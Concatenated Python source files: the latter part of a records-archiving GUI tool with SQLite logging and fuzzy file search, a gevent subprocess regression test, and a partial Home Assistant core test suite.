shutil.copyfile(src=self.current_path, dst=self.get_destination_path())
except Exception as e:
return False, e
try:
os.remove(self.current_path)
return True, ''
except Exception as e:
return False, e
class SqliteDatabase:
def __init__(self, path):
self.datetime_format = "%m/%d/%Y, %H:%M:%S"
self.path = path
self.archivist_tablename = 'archivists'
self.document_tablename = 'archived_files'
self.connection = sqlite3.connect(self.path)
self.archivists_table_cols = {'email': 'TEXT NOT NULL'}
self.archived_doc_table_cols = {'destination_path': 'TEXT', 'project_number': 'TEXT',
'document_date': 'TEXT', 'destination_directory': 'TEXT',
'file_code': 'TEXT', 'file_size': 'REAL', 'date_archived': 'TEXT',
'archivist_id': 'INTEGER NOT NULL', 'notes' : 'TEXT'
}
# Creates tables if they do not exist yet
with closing(sqlite3.connect(self.path)) as conn:
c = conn.cursor()
archivists_setup_sql = f"""CREATE TABLE IF NOT EXISTS {self.archivist_tablename} (id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE, """
for col, col_type in self.archivists_table_cols.items():
col = col.strip()
col_type = col_type.strip()
archivists_setup_sql += f"{col} {col_type}," + os.linesep
# replace comma and newline with back-parenthese and semi-colon to end sql string
archivists_setup_sql = archivists_setup_sql[:-3] + r"); "
c.execute(archivists_setup_sql)
archival_docs_setup_sql = f"""CREATE TABLE IF NOT EXISTS {self.document_tablename} (id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE, """
foreign_key_string = ""
for col, col_type in self.archived_doc_table_cols.items():
col = col.strip()
col_type = col_type.strip()
archival_docs_setup_sql += f"{col} {col_type}," + os.linesep
if col.lower().endswith('id'):
foreign_key_string += f"""FOREIGN KEY({col}) REFERENCES {self.archivist_tablename}(id), """
foreign_key_string += os.linesep
archival_docs_setup_sql += foreign_key_string
archival_docs_setup_sql = archival_docs_setup_sql[:-4] + r"); "
c.execute(archival_docs_setup_sql)
def add_user(self, archivist_dict):
column_names = list(self.archivists_table_cols.keys())
questionmark_placeholders = ",".join(['?' for _ in column_names])
sql_cols = ",".join(column_names)
insert_sql = f""" INSERT INTO {self.archivist_tablename}({sql_cols}) VALUES({questionmark_placeholders}) """
with sqlite3.connect(self.path) as conn:
c = conn.cursor()
vals = tuple([archivist_dict[k] for k in column_names])
c.execute(insert_sql, vals)
def user_id_from_email(self, user_email):
with closing(sqlite3.connect(self.path)) as conn:
c = conn.cursor()
user_id = None
while not user_id:
get_user_id_sql = f"""SELECT id FROM {self.archivist_tablename} WHERE email = ?"""
c.execute(get_user_id_sql, (user_email,))
sql_results = c.fetchone()
if not sql_results:
self.add_user({'email': user_email})
continue
user_id = sql_results[0]
return user_id
def record_document(self, arch_document: ArchivalFile, archivist_email):
"""
:param arch_document:
:param archivist_email:
:return:
"""
column_names = list(self.archived_doc_table_cols.keys())
questionmark_placeholders = ",".join(['?' for _ in column_names])
sql_cols = ",".join(column_names)
insert_sql = f""" INSERT INTO {self.document_tablename}({sql_cols}) VALUES({questionmark_placeholders}) """
with sqlite3.connect(self.path) as conn:
c = conn.cursor()
attribute_val_dict = arch_document.attribute_defaultdict()
attribute_val_dict['archivist_id'] = self.user_id_from_email(archivist_email)
archived_doc_vals = []
for col in column_names:
if col == 'date_archived':
archived_doc_vals.append(datetime.now().strftime(self.datetime_format))
continue
archived_doc_vals.append(attribute_val_dict[col])
c.execute(insert_sql, archived_doc_vals)
class Researcher:
def __init__(self):
self.xx_dirs_to_ignore = ["01XX JOCs", "00xx Consulting Agreements", "10xx Regulatory Requirements",
"110xx Infrastructure Planning Documents and Studies",
"111xx Area Planning Documents and Studies",
"112xx Proposed Structure Planning Documents and Studies",
"113xx Environmental Planning Documents and Studies",
"114xx Long Range Development Planning (LRDP) Documents and Studies",
"115xx Student Issues Planning & Studies",
"116xx Economic Planning Documents and Studies",
"117xx Handicap ADA Planning Documents and Studies",
"130xx Campus Reference Materials", "140xx Storm Water Management"]
def similar_filename_paths(self, original_filename, duration=6, similarity_threshold=72, max_paths=10):
"""
:param original_filename: (not the path)
:param duration: length of time in seconds that this search algorithm can run
:param similarity_threshold: how similar a filename needs to be to be included as similar
:param max_paths: maximum number of filepaths that will be returned
:return:
"""
# TODO: could be made better by removing common, unhelpful tokens from original_filename
# TODO: copuld be made better by removing very short (or comparably short) filenames from being compared to original_filename
# start search timer
start_time = time.time()
current_time = start_time
similarly_named_files = []
dirs_to_ignore = self.xx_dirs_to_ignore.copy()
# tests directory to see if it should be considered when searching for similar files.
is_xx_dir_to_search = lambda dir_name: ('xx' in dir_name.lower().split(" ")[0]) and (
not os.path.isfile(os.path.join(RECORDS_SERVER_LOCATION, dir_name))) and (
dir_name not in dirs_to_ignore)
# While this search has not taken up the allocated time or found sufficient number of similar files...
while (current_time - start_time) < duration and len(similarly_named_files) < max_paths:
xx_level_dirs = [d for d in os.listdir(RECORDS_SERVER_LOCATION) if is_xx_dir_to_search(d)]
random_index = random.randint(0, len(xx_level_dirs) - 1)
# Path of random xx level directory where we will initialize a search.
random_xx_start = os.path.join(RECORDS_SERVER_LOCATION, xx_level_dirs[random_index])
dirs_to_ignore.append(xx_level_dirs[random_index])
# choose another directory at random from which to begin search
number_dirs = [dir for dir in os.listdir(random_xx_start) if
os.path.isdir(os.path.join(random_xx_start, dir))]
random_index2 = random.randint(0, len(number_dirs) - 1)
random_search_start = os.path.join(random_xx_start, number_dirs[random_index2])
# Iterate through directory structure from the random starting dir...
for root, dirs, files in os.walk(random_search_start):
found_similar_file = False
for some_file in files:
ratio = fuzz.token_set_ratio(original_filename, some_file)
# if the fuzzy filename comparison calculates a similarity above our threshhold...
if ratio > similarity_threshold:
# append this searched directory so that we won't research this directory
similar_file_filepath = os.path.join(root, some_file)
similarly_named_files.append({"filepath": similar_file_filepath, "ratio": ratio})
found_similar_file = True
break
current_time = time.time()
if found_similar_file or (current_time - start_time) > duration:
break
return similarly_named_files
def randomized_destination_examples(self, dest_dir, num_of_examples=3,
duration=4, files_in_example=3):
"""
Starting at a random location in the directories within the xx level directories, search for examples of the
same destination directory with at least a sufficient number of files in it to be used as examples --
demonstrating the types of files that would be found in a given destination directory
:param dest_dir: str name of the destination directory
:param num_of_examples: int number of destination directory paths to be returned
:param duration: int alotted number of seconds for this function to search for
:param files_in_example: int minimum number of files to be in a directory for it to be considered as an example
:return: list of path strings.
"""
def is_good_dir_example(chosen_destination_dir, dir_example_path, desired_files_num=files_in_example):
"""
Sub-routine for deciding if a given directory represents a good example of the chosen directory type.
for the purposes of this application, a good directory example starts with the same filing code
(eg C1.2, F10, H) and has the desired number of files in it.
:param original_dir:
:param dir_example_path:
:param desired_files_num:
:return:
"""
# a directory name probably starts with a filing code (eg C1.2, F10, H) if it starts with a letter and when
# split by spaces, the second element is a dash #TODO may need improving
probably_has_filing_code = lambda dir: (len(dir.split(" ")) > 2) and (dir[0].isalpha()) and \
(dir.split(" ")[1] == "-")
example_dir_name = ArchiverUtilities.split_path(dir_example_path)[-1]
if not probably_has_filing_code(example_dir_name):
return False
# if the directory doesn't share a filing code with chosen destination dir, it is not a good example
example_file_code = ArchiverUtilities.file_code_from_destination_dir(example_dir_name)
if not ArchiverUtilities.file_code_from_destination_dir(chosen_destination_dir) == example_file_code:
return False
# if the example directory doesn't have enough files in it, it is a bad example
files_in_example = [file for file in os.listdir(dir_example_path) if
os.path.isfile(os.path.join(dir_example_path, file))]
if not len(files_in_example) >= desired_files_num:
return False
return True
start_time = time.time()
current_time = start_time
example_dir_paths = []
dirs_to_ignore = self.xx_dirs_to_ignore.copy()
# function to test directory to see if it should be considered when searching for good destination examples.
is_xx_dir_to_search = lambda dir_name: ('xx' in dir_name.lower().split(" ")[0]) and (
not os.path.isfile(os.path.join(RECORDS_SERVER_LOCATION, dir_name))) and (
dir_name not in dirs_to_ignore)
# While the duration allotted for this function has not been used and we haven't found enough good destination
# examples, choose random xx level directory and a subsequent random project number directory to search for
# another example of the destination directory.
while (current_time - start_time) < duration and len(example_dir_paths) < num_of_examples:
xx_level_dirs = [d for d in os.listdir(RECORDS_SERVER_LOCATION) if is_xx_dir_to_search(d)]
random_index = random.randint(0, len(xx_level_dirs) - 1)
# Path of random xx level directory where we will initialize a search.
random_xx_start = os.path.join(RECORDS_SERVER_LOCATION, xx_level_dirs[random_index])
dirs_to_ignore.append(xx_level_dirs[random_index])
#choose another directory at random from which to begin search
number_dirs = [dir for dir in os.listdir(random_xx_start) if
os.path.isdir(os.path.join(random_xx_start, dir))]
random_index2 = random.randint(0, len(number_dirs) - 1)
random_search_start = os.path.join(random_xx_start, number_dirs[random_index2])
for root, dirs, files in os.walk(random_search_start):
good_dir_example = False
if not is_good_dir_example(chosen_destination_dir=dest_dir, dir_example_path=root):
current_time = time.time()
if (current_time - start_time) > duration:
break
continue
#add good example path to example path list
example_dir_paths.append(root)
current_time = time.time()
break
return example_dir_paths
class Archivist:
"""
Class for executing main archiving procedure
"""
def __init__(self, files_to_archive_directory: str, app_files_directory: str, records_drive_path: str,
gui_file_icon: str, gui_dir_icon: str, database_location: str,
file_to_archive: ArchivalFile = None):
##Build necessary directory structure###
self.files_to_archive_directory = files_to_archive_directory
if not os.path.exists(files_to_archive_directory):
try:
os.mkdir(files_to_archive_directory)
except Exception as e:
print(e)
print(f"error from trying to make {files_to_archive_directory}")
self.app_files_directory = app_files_directory
if not os.path.exists(self.app_files_directory):
try:
os.mkdir(self.app_files_directory)
except Exception as e:
print(e)
print(f"error from trying to make {self.app_files_directory}")
self.opened_copies_directory = os.path.join(self.app_files_directory, 'temp')
if not os.path.exists(self.opened_copies_directory):
try:
os.mkdir(self.opened_copies_directory)
except Exception as e:
print(e)
print(f"error from trying to make {self.opened_copies_directory}")
gui_file_icon_path = ''
if gui_file_icon:
gui_file_icon_path = os.path.join(self.app_files_directory, gui_file_icon)
gui_dir_icon_path = ''
if gui_dir_icon:
gui_dir_icon_path = os.path.join(self.app_files_directory, gui_dir_icon)
self.records_drive_path = records_drive_path
self.gui = GuiHandler(file_icon_path=gui_file_icon_path, folder_icon_path=gui_dir_icon_path)
self.file_to_archive = file_to_archive
self.email = None
self.default_project_number = None
self.perform_research = True
self.researcher = Researcher()
self.database = SqliteDatabase(database_location)
self.datetime_format = "%m/%d/%Y, %H:%M:%S"
def info_window(self, window_name="ERROR", info_message='', is_error=True) -> bool:
"""
:param is_error: Should it use special configuration for displaying errors.
:param window_name:
:param info_message: string message to display
:return: bool whether user hit 'ok' button or not
"""
info_layout = self.gui.info_message_layout(info_message=info_message, error=is_error)
info_window_results = self.gui.make_window(window_name=window_name, window_layout=info_layout)
if info_window_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
self.exit_app()
return info_window_results["Button Event"].lower() == "ok"
def retrieve_email(self):
welcome_window_layout = self.gui.welcome_layout()
welcome_window_results = self.gui.make_window("Welcome!", welcome_window_layout)
# if the user clicks exit, shutdown app
if welcome_window_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
self.exit_app()
else:
self.email = welcome_window_results["Archivist Email"]
return
def open_file_copy(self, filepath: str = ''):
"""
Creates a copy of the file in the opened_copies_directory directory and opens that copy. Will open
self.file_to_archive if no filepath parameter is given
:return: None
"""
if not filepath:
filepath = self.file_to_archive.current_path
timestamp = str(time.time()).split(".")[0]
filename = ArchiverUtilities.split_path(filepath)[-1]
copies_dir = os.path.join(os.getcwd(), self.opened_copies_directory)
copy_path = os.path.join(copies_dir, (timestamp + "_" + filename))
shutil.copyfile(src=filepath, dst=copy_path)
ArchiverUtilities.open_file_with_system_application(copy_path)
return
def files_to_archive(self, archiver_dir_path=None):
"""
return a list of paths to files to archive in the self.files_to_archive_directory or achiver_dir_path
:param archiver_dir_path: path to directory with files to archive
:return: List of filepaths
"""
if archiver_dir_path:
self.files_to_archive_directory = archiver_dir_path
if self.files_to_archive_directory and not archiver_dir_path:
archiver_dir_path = self.files_to_archive_directory
# TODO if not archiver_dir_path and not self.files_to_archive_directory (maybe not relevant)
files = [os.path.join(archiver_dir_path, file) for file in os.listdir(archiver_dir_path) if
not (file in FILENAMES_TO_IGNORE or os.path.isdir(os.path.join(archiver_dir_path, file)))]
return files
def retrieve_file_destination_choice(self):
"""
retrieves
:return:
"""
files_in_archiving_dir = self.files_to_archive()
#
default_proj_number = ""
if self.default_project_number:
default_proj_number = self.default_project_number
current_file = ArchiverUtilities.split_path(files_in_archiving_dir[0])[-1]
destination_window_layout = self.gui.destination_choice_layout(dir_choices=DIRECTORY_CHOICES,
current_filename=current_file,
default_project_num=default_proj_number,
research_default=self.perform_research)
destination_gui_results = self.gui.make_window(window_name="Enter file and destination info.",
window_layout=destination_window_layout)
if (not destination_gui_results["Button Event"]) or destination_gui_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
self.exit_app()
#if the user selects the open copy window, open a copy an relaunch the window
if destination_gui_results["Button Event"].lower() == "open copy":
self.open_file_copy()
return self.retrieve_file_destination_choice()
if destination_gui_results["Button Event"].lower() == "back":
return ""
if destination_gui_results["Button Event"].lower() == "ok":
# use default project number unless new project number was given
project_num = destination_gui_results["New Project Number"]
if not project_num:
project_num = default_proj_number
self.default_project_number = project_num
#set the default research setting
self.perform_research = destination_gui_results["Research"]
directory_choice = ''
file_code = ''
if destination_gui_results["Directory Choice"]:
directory_choice = destination_gui_results["Directory Choice"][0]
# If there was a manually entered path, populate the file_code, destination_dir, and cached_destination_path
# attribute for the file_to_archive attribute.
manual_archived_path = destination_gui_results["Manual Path"]
doc_date = destination_gui_results["Document Date"]
if manual_archived_path:
# Need to attempt to extract the destination directory from manual filepath
# Do this by moving in reverse through the path and grabbing highest level directory that starts with
# with a filing code
file_codes_list = [ArchiverUtilities.file_code_from_destination_dir(dir) for dir in DIRECTORY_CHOICES]
file_codes_list = [code + " " if len(code) == 1 else code for code in file_codes_list]
directory_choice = ""
manual_path_list = ArchiverUtilities.split_path(manual_archived_path)
manual_path_list.reverse()
for idx, dirname in enumerate(manual_path_list):
if (dirname[:3] in file_codes_list) or (dirname[:2] in file_codes_list):
directory_choice = dirname
break
if not directory_choice:
raise Exception(f"Could not parse a filing code from the given directory path: \n{manual_archived_path}")
file_code = ArchiverUtilities.file_code_from_destination_dir(directory_choice)
# Attempt to get the project number from the path.
# If no project number then request archivist enter one.
project_num = ArchiverUtilities.project_number_from_path(manual_archived_path)
if not project_num:
error = "Unable to parse a project number from the destination path. Please enter a project number in addition to the destination path."
no_proj_num_layout = self.gui.info_message_layout(info_message=str(error), error=True)
self.gui.make_window("Missing project number", window_layout=no_proj_num_layout)
return ""
file_notes = destination_gui_results["Notes"]
new_filename = None
if destination_gui_results["Filename"]:
new_filename = ArchiverUtilities.cleanse_filename(destination_gui_results["Filename"])
self.file_to_archive = ArchivalFile(current_path=files_in_archiving_dir[0],
project=project_num,
new_filename=new_filename,
destination_dir=directory_choice,
document_date=doc_date,
notes=file_notes)
if manual_archived_path:
if file_code:
self.file_to_archive.file_code = file_code
self.file_to_archive.cached_destination_path = os.path.join(manual_archived_path,
self.file_to_archive.assemble_destination_filename())
return self.file_to_archive
def research_for_archival_file(self, files=[], destinations=[]):
"""
This wrapper function packages the results of the researcher so that it can be called within the
GuiHandler.Loading_screen() which cannot return values
:param files:
:param destinations:
:return:
"""
filename = self.file_to_archive.new_filename
if not filename:
filename = ArchiverUtilities.split_path(self.file_to_archive.current_path)[-1]
files += self.researcher.similar_filename_paths(original_filename=filename, duration=6, similarity_threshold=72,
max_paths=7)
destinations += self.researcher.randomized_destination_examples(
dest_dir=self.file_to_archive.destination_dir,)
return files, destinations
def confirm_chosen_file_destination(self):
"""
spins up the confirmation screen gui and returns true if the desired path has been confirmed by the user.
Will perform research if that option was ticked.
This also will exit the program if the user selects the 'exit' button in the gui.
:param gui_file_icon:
:param gui_dir_icon:
:return:
"""
try:
file_destination = self.file_to_archive.get_destination_path()
except Exception as error:
except_layout = self.gui.info_message_layout(info_message=str(error), error=True)
gui_results = self.gui.make_window(window_name="Invalid Destination Choices", window_layout=except_layout)
if gui_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
self.exit_app()
return False
else:
# If the destination directory exists, we'll display its contents as a tree element. First need to extract
# the path to the destination directory and see if it already exists.
destination_tree = None
destination_list = ArchiverUtilities.split_path(self.file_to_archive.get_destination_path())
path_to_destination_dir = os.path.join(*destination_list[:-1])
if os.path.exists(path_to_destination_dir):
destination_tree = self.gui.directory_treedata('', path_to_destination_dir)
#if user chose to do research...
similar_files_paths, destination_examples = [], []
if self.perform_research:
# The loading screen gui cannot return values. hence some jiggery-pokery to make the functions change
# existing objects en lieu of returning the research results
perform_research = lambda : self.research_for_archival_file(files=similar_files_paths,
destinations=destination_examples)
self.gui.loading_screen(long_func=perform_research, loading_window_name="Researching...",
loading_text= "Performing research; please wait...")
similar_files_paths = [path['filepath'] for path in similar_files_paths]
# create tree data structures from directory paths
destination_examples = {path: self.gui.directory_treedata('', path) for path in destination_examples}
confirmation_gui_layout = self.gui.confirmation_layout(destination_path=file_destination,
destination_tree_data=destination_tree,
similar_files=similar_files_paths,
dir_trees=destination_examples)
gui_results = self.gui.make_window("Confirm destination choice.", confirmation_gui_layout)
if gui_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
self.exit_app()
return gui_results["Button Event"].lower() == "ok"
def archive_file(self):
#if there is a path collision throw an error
if self.file_to_archive.cached_destination_path and os.path.exists(self.file_to_archive.cached_destination_path):
self.info_window(
info_message=f"A file exists in that location with the same path: {self.file_to_archive.cached_destination_path}")
return
#try to archive the file (kinda fraught) and display any isssues that might have come up.
archiving_successful, archive_exception = self.file_to_archive.archive()
if not archiving_successful:
permission_issue = self.file_to_archive.check_permissions()
permissions_error_message = "When attempting to duplicate the file to the records drive, \n" +\
"the application ran into file access issues: \n"
if archive_exception:
permissions_error_message += f"The shutil.copyfile() call produced this error: \n {archive_exception}\n"
if permission_issue:
permissions_error_message += f"Testing the permissions of the file yielded: \n {permission_issue}\n"
self.info_window(info_message=permissions_error_message)
return False
return True
def add_archived_file_to_csv(self, csv_path):
"""
Method for saving the metadata from a file to archive in a csv file.
Deprecated en lieu of using sql storage solution.
:param csv_path:
:return:
"""
data_dict = self.file_to_archive.attribute_defaultdict()
data_dict["archiver_email"] = self.email
# make csv file if it doesn't yet exist
if not os.path.exists(csv_path):
df = pd.DataFrame(columns= list(data_dict.keys()))
df.to_csv(csv_path)
archived_file_df = pd.DataFrame(data_dict, index=[0, ])
archived_file_df.to_csv(csv_path, mode='a', index=False, header=False)
def add_archived_file_to_database(self):
"""
Stores archival metadata in the database
:return:
"""
self.database.record_document(arch_document= self.file_to_archive, archivist_email= self.email)
def retrieve_file_to_archive(self):
"""
Ensures files exit to be archived and that the next file is queued up as the Archivist.file_to_archive
:return:
"""
while not self.files_to_archive():
no_file_error_message = f"No files to archive. To archive additional files, add them to: " + os.linesep +\
f"{self.files_to_archive_directory}"
self.info_window(window_name="Directory Empty", info_message=no_file_error_message, is_error=False)
current_file = self.files_to_archive()[0]
self.file_to_archive = ArchivalFile(current_path= os.path.join(self.files_to_archive_directory, current_file))
def exit_app(self):
"""
process for shutting down the app. Attempts to clear the temporary files directory.
:return:
"""
# Attempt to delete all the files in the self.opened_copies_directory.
open_copies_dir_path = os.path.join(os.getcwd(), self.opened_copies_directory)
opened_file_copies = [os.path.join(open_copies_dir_path, f) for f in os.listdir(open_copies_dir_path) if
os.path.isfile(os.path.join(open_copies_dir_path, f))]
for opened_filepath in opened_file_copies:
try:
os.remove(opened_filepath)
except Exception as e:
print(f"Failed at deleting a temp file: \n {opened_filepath}\n Error: \n {e}")
continue
exit()
class Tester:
@staticmethod
def test_gui():
dir = r"C:\Users\adankert\Google Drive\GitHub\archives_archiver\app_files"
file_icon_path = os.path.join(dir, "file_3d_32x32.png")
folder_icon_path = os.path.join(dir, "folder_3d_32x32.png")
gui = GuiHandler(file_icon_path=file_icon_path, folder_icon_path=folder_icon_path)
path_examples = [r"R:\49xx Long Marine Lab\4900\4900-007\F5 - Drawings and Specifications",
r"R:\49xx Long Marine Lab\4900\4900-021\A - General\A2 - Working File",
r"R:\27xx Applied Sciences Baskin Engineering\2703\2703\F8 - Contract"]
forest = []
for example in path_examples:
forest.append(gui.directory_treedata('', example))
gui.make_window("Test Confirm",
gui.confirmation_layout(r"C:\Users\adankert\Google Drive\GitHub\archives_archiver\app_files",
similar_files=[], dir_trees=forest))
@staticmethod
def test_assemble_destination_path():
project = '2700'
desired_destination = DIRECTORY_CHOICES[8]
print(desired_destination)
new_filename = "2744.G19.Notice of Completion"
location = os.path.join(os.getcwd(), "files_to_archive")
file = ArchivalFile(current_location_path=location, project=project, new_filename=new_filename,
destination_dir=desired_destination)
dest_path = file.get_destination_path()
print(dest_path)
@staticmethod
def test_researcher():
print("Similar File Examples: \n")
og_filename = "20.07.10 Sewer Excavated.pdf"
searcher = Researcher()
similar_filenames = searcher.similar_filename_paths(original_filename=og_filename, duration=8)
[print(x["filepath"]) for x in similar_filenames]
print("\n \n")
print("Destination Examples: \n")
dir_choice = "C1 - Executive Architect"
directory_examples = searcher.randomized_destination_examples(dest_dir= dir_choice, duration= 18)
[print(example) for example in directory_examples]
@staticmethod
def test_loading_screen():
def wait_eight():
print("waiting 8 seconds.")
time.sleep(8)
print("wait over")
gui = GuiHandler()
gui.loading_screen(wait_eight)
return
@staticmethod
def test_layout(some_layout):
window = sg.Window("test", some_layout)
event, values = window.read()
time.sleep(2)
window.close()
return event, values
@staticmethod
def test_sqlitedb():
location = r"\\128.114.170.27\Cannon_Scans\test_db"
datetime_format = "%m/%d/%Y, %H:%M:%S"
DB = SqliteDatabase(location, "test.db", datetime_format)
test_file = ArchivalFile(
current_path=r"C:\Users\adankert\Google Drive\GitHub\archives_archiver\files_to_archive\20220317103244.pdf",
project='2512',destination_path=r"R:\24xx Physical Plant Buildings\2512\F8 - Contract",
new_filename= "RFI 061",notes="These are test notes",destination_dir="F8 - Contract",
document_date="December 5, 2012")
DB.record_document(test_file, 'testemail2@ucsc.edu')
def main():
app_files_dir = 'app_files'
database_path = r"\\128.114.170.27\Archive_Data\archives_archiver.db"
gui_file_icon_filename = "file_3d_32x32.png"
gui_dir_icon_filename = "folder_3d_32x32.png"
dir_of_files_to_archive = os.path.join(os.getcwd(), "files_to_archive")
ppdo_archivist = Archivist(files_to_archive_directory=dir_of_files_to_archive,
app_files_directory=os.path.join(os.getcwd(), app_files_dir),
records_drive_path=RECORDS_SERVER_LOCATION,
gui_file_icon=gui_file_icon_filename,
gui_dir_icon=gui_dir_icon_filename,
database_location=database_path)
ppdo_archivist.retrieve_email()
while True:
ppdo_archivist.retrieve_file_to_archive()
ppdo_archivist.retrieve_file_destination_choice()
#if no destination directory was chosen display error message
if not ppdo_archivist.file_to_archive.destination_dir:
ppdo_archivist.info_window("No destination directory was selected.")
continue
destination_confirmed = ppdo_archivist.confirm_chosen_file_destination()
if destination_confirmed:
is_archived = ppdo_archivist.archive_file()
if is_archived:
ppdo_archivist.add_archived_file_to_database()
print(f"File archived: " + os.linesep + f"{ppdo_archivist.file_to_archive.cached_destination_path}")
if __name__ == "__main__":
# Tester.test_gui()
# Tester.test_assemble_destination_path()
# Tester.test_researcher()
# Tester.test_loading_screen()
#Tester.test_sqlitedb()
main()
|
test__issue600.py | # Make sure that libev child watchers, implicitly installed through the use
# of subprocess, do not cause waitpid() to fail to poll for processes.
# NOTE: This was only reproducible under python 2.
from __future__ import print_function
import gevent
from gevent import monkey
monkey.patch_all()
import sys
from multiprocessing import Process
from subprocess import Popen, PIPE
from gevent import testing as greentest
def f(sleep_sec):
gevent.sleep(sleep_sec)
class TestIssue600(greentest.TestCase):
__timeout__ = greentest.LARGE_TIMEOUT
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_invoke(self):
# Run a subprocess through Popen to make sure
# libev is handling SIGCHLD. This could *probably* be simplified to use
# just hub.loop.install_sigchld
# (no __enter__/__exit__ on Py2) pylint:disable=consider-using-with
p = Popen([sys.executable, '-V'], stdout=PIPE, stderr=PIPE)
gevent.sleep(0)
p.communicate()
gevent.sleep(0)
def test_process(self):
# Launch
p = Process(target=f, args=(0.5,))
p.start()
with gevent.Timeout(3):
# Poll for up to 10 seconds. If the bug exists,
# this will timeout because our subprocess should
# be long gone by now
p.join(10)
if __name__ == '__main__':
greentest.main()
|
test_core.py | """
tests.test_core
~~~~~~~~~~~~~~~~~
Provides tests to verify that Home Assistant core works.
"""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import os
import unittest
import unittest.mock as mock
import time
import threading
from datetime import datetime
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
import homeassistant.util.dt as dt_util
from homeassistant.helpers.event import track_state_change
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
ATTR_FRIENDLY_NAME, TEMP_CELCIUS,
TEMP_FAHRENHEIT)
PST = pytz.timezone('America/Los_Angeles')
class TestHomeAssistant(unittest.TestCase):
"""
Tests the Home Assistant core classes.
"""
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.hass = ha.HomeAssistant()
self.hass.states.set("light.Bowl", "on")
self.hass.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
try:
self.hass.stop()
except HomeAssistantError:
# Already stopped after the block till stopped test
pass
def test_start(self):
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
lambda event: calls.append(1))
self.hass.start()
self.hass.pool.block_till_done()
self.assertEqual(1, len(calls))
def test_block_till_stoped(self):
""" Test if we can block till stop service is called. """
blocking_thread = threading.Thread(target=self.hass.block_till_stopped)
self.assertFalse(blocking_thread.is_alive())
blocking_thread.start()
# Threads are unpredictable, try 20 times if we're ready
wait_loops = 0
while not blocking_thread.is_alive() and wait_loops < 20:
wait_loops += 1
time.sleep(0.05)
self.assertTrue(blocking_thread.is_alive())
self.hass.services.call(ha.DOMAIN, ha.SERVICE_HOMEASSISTANT_STOP)
self.hass.pool.block_till_done()
# Threads are unpredictable, try 20 times if we're ready
wait_loops = 0
while blocking_thread.is_alive() and wait_loops < 20:
wait_loops += 1
time.sleep(0.05)
self.assertFalse(blocking_thread.is_alive())
def test_stopping_with_keyboardinterrupt(self):
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
lambda event: calls.append(1))
def raise_keyboardinterrupt(length):
# We don't want to patch the sleep of the timer.
if length == 1:
raise KeyboardInterrupt
self.hass.start()
with mock.patch('time.sleep', raise_keyboardinterrupt):
self.hass.block_till_stopped()
self.assertEqual(1, len(calls))
def test_track_point_in_time(self):
""" Test track point in time. """
before_birthday = datetime(1985, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
birthday_paulus = datetime(1986, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
after_birthday = datetime(1987, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
runs = []
self.hass.track_point_in_utc_time(
lambda x: runs.append(1), birthday_paulus)
self._send_time_changed(before_birthday)
self.hass.pool.block_till_done()
self.assertEqual(0, len(runs))
self._send_time_changed(birthday_paulus)
self.hass.pool.block_till_done()
self.assertEqual(1, len(runs))
# A point in time tracker will only fire once, this should do nothing
self._send_time_changed(birthday_paulus)
self.hass.pool.block_till_done()
self.assertEqual(1, len(runs))
self.hass.track_point_in_time(
lambda x: runs.append(1), birthday_paulus)
self._send_time_changed(after_birthday)
self.hass.pool.block_till_done()
self.assertEqual(2, len(runs))
def test_track_time_change(self):
""" Test tracking time change. """
wildcard_runs = []
specific_runs = []
self.hass.track_time_change(lambda x: wildcard_runs.append(1))
self.hass.track_utc_time_change(
lambda x: specific_runs.append(1), second=[0, 30])
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 0))
self.hass.pool.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 15))
self.hass.pool.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(2, len(wildcard_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 30))
self.hass.pool.block_till_done()
self.assertEqual(2, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
def _send_time_changed(self, now):
""" Send a time changed event. """
self.hass.bus.fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: now})
class TestEvent(unittest.TestCase):
""" Test Event class. """
def test_eq(self):
now = dt_util.utcnow()
data = {'some': 'attr'}
event1, event2 = [
ha.Event('some_type', data, time_fired=now)
for _ in range(2)
]
self.assertEqual(event1, event2)
def test_repr(self):
""" Test that repr method works. #MoreCoverage """
self.assertEqual(
"<Event TestEvent[L]>",
str(ha.Event("TestEvent")))
self.assertEqual(
"<Event TestEvent[R]: beer=nice>",
str(ha.Event("TestEvent",
{"beer": "nice"},
ha.EventOrigin.remote)))
def test_as_dict(self):
event_type = 'some_type'
now = dt_util.utcnow()
data = {'some': 'attr'}
event = ha.Event(event_type, data, ha.EventOrigin.local, now)
expected = {
'event_type': event_type,
'data': data,
'origin': 'LOCAL',
'time_fired': dt_util.datetime_to_str(now),
}
self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.bus = ha.EventBus(ha.create_worker_pool(0))
self.bus.listen('test_event', lambda x: len)
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.bus._pool.stop()
def test_add_remove_listener(self):
""" Test remove_listener method. """
self.bus._pool.add_worker()
old_count = len(self.bus.listeners)
listener = lambda x: len
self.bus.listen('test', listener)
